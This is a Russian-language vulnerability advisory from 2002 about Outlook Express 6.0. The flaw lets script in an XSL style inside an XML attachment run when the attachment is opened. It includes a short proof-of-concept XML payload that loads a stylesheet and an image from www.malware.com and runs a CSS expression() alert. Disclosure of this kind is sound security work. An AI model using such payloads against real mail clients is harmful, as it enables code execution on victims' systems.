Дата публикации: | 05.08.2002 |
Всего просмотров: | 1075 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Обнаруженная уязвимость в Microsoft Outlook Express позволяет злонамеренному XML вложению выполнять произвольный код в контексте местной системы безопасности. Код будет выполнен при открытии вложения без всякого предупреждения. Уязвимость связанна с неправильной обработкой кода сценария включенного в XSL style, внедренного в XML документ. Обычно, информации XSL стиля не разрешается выполнение XML сценариев в пределах ограниченной зоны безопасности. Однако код сценария может быть выполнен, если он может определить местоположение каталога Temporary Internet File (TIF), который в свою очередь позволяет выполнение произвольного кода в пределах Local System security zone. Пример: <?xml version="1.0" ?> <?xml-stylesheet type="text/css" href="http://www.malware.com/malware.css" ?> <malware> <h4 style="position: absolute;top:39;left:expression(alert (document.location));font-family:arial;font-size:12pt;BACKGROUND- IMAGE:url('http://www.malware.com/youlickit.gif');background- repeat:no-repeat;background-position: 100 30;z-index:- 100;height:200pt;width:400pt;font-family:Verdana;color:red">sure it can, malware says so</h4> </malware>Уязвимость обнаружена в Microsoft Outlook Express 6.0 |
Ссылки: | WHERE'S THE CA$H: Internet Explorer 6.00. Outlook Express 6.00 |